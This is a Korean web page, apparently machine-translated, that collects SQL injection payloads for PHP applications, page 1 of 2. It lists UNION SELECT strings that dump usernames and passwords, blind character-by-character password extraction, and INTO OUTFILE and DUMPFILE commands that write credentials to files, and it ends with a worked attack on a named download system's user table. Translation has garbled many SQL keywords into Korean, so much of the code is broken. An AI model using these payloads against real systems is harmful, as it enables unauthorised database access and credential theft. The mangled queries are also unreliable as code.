http://www.56.com/m2v/?magic=1 고급 PHP 주입 방법 모음 페이지 1/2
- WBOY원래의
- 2016-07-29 08:38:251415검색
'#
' 및 passWord='mypass
id=-1 Union Select 1,1,1
id=-1 Union Select char(97),char(97),char(97)
id=1 조합원에서 1,1,1 선택
id=1 관리자에서 조합 선택 1,1,1
id=1 사용자
userid=1에서 조합 선택 1,1,1 및 비밀번호=mypass
userid=1 및 mid(password,3,1)=char(112)
userid=1 및 mid(password,4,1)=char(97)
및 ord(mid (password,3,1))>111(ord 함수는 매우 유용하며 정수를 반환할 수 있음)
' 및 LENGTH(password)='6(비밀번호 길이 감지)
' 및 LEFT(password,1 )='m
' and LEFT(password,2)='my
…………………… 등등
' 유니온 선택 1,username,password from user/*
' Union select 1,username,password from user/*
=' Union select 1,username,password from user/* (1이거나 바로 뒤에 =가 올 수 있음)
99999' Union select 1,사용자 이름, 비밀번호 from user/*
' into outfile 'c:/file.txt (export file)
=' 또는 1=1 into outfile 'c:/file.txt
1' 유니온 선택 1,username , 사용자의 비밀번호를 outfile 'c:/user.txt
비밀번호 선택 FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
id=' 유니온 선택 1, 사용자 이름 ,사용자의 비밀번호를 outfile로
id=-1 Union select 1,database(),version()(유연한 애플리케이션 쿼리)
일반적인 쿼리 테스트 문,
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1 1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL (COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END
예: 밤고양이 다운로드 시스템 버전 1.0
id=1 Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1
ymdown_user
에서 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 유니온 선택
유니온 선택 ymdown_user의 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 여기서 id=1
id=10000 공용체 ymdown_user에서 id=1 및 groupid=1 union ymdown_user에서 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1을 선택합니다. 여기서 id는 1입니다(교체, 검색 비밀번호)
ymdown_user에서 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1을 선택합니다. 여기서 ID는 1입니다. and ord(mid(password,1,1))=49 (첫 번째 비밀번호 확인)
union select 1,1,1,1,1,1,1,1,1,1,1,1, 1 ,1,1,1,1,1,1 from ymdown_user 여기서 id=1 및 ord(mid(password,2,1))=50(두 번째 위치)
union select 1,1,1,1 ,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user 여기서 id=1 및 ord(mid(password,3,1))=51
… >union(allowsmilies,public, userid,'0000-0-0',user(),version() FROM Calendar_events 선택, eventid = 13) 이벤트 날짜별 순서
union(allowmilies,public,userid,'0000- 선택) 0-0',pass() ,version() FROM Calendar_events 여기서 eventid = 10) 이벤트 날짜별 순서
현재 1/2 페이지 12다음 페이지
위 내용은 http://www.56.com/m2v/?magic=1 측면을 포함하여 1/2페이지에 http://www.56.com/m2v/?magic=1 고급 PHP 주입 방법 모음을 소개합니다. , PHP 튜토리얼에 관심이 있는 친구들에게 도움이 되길 바랍니다.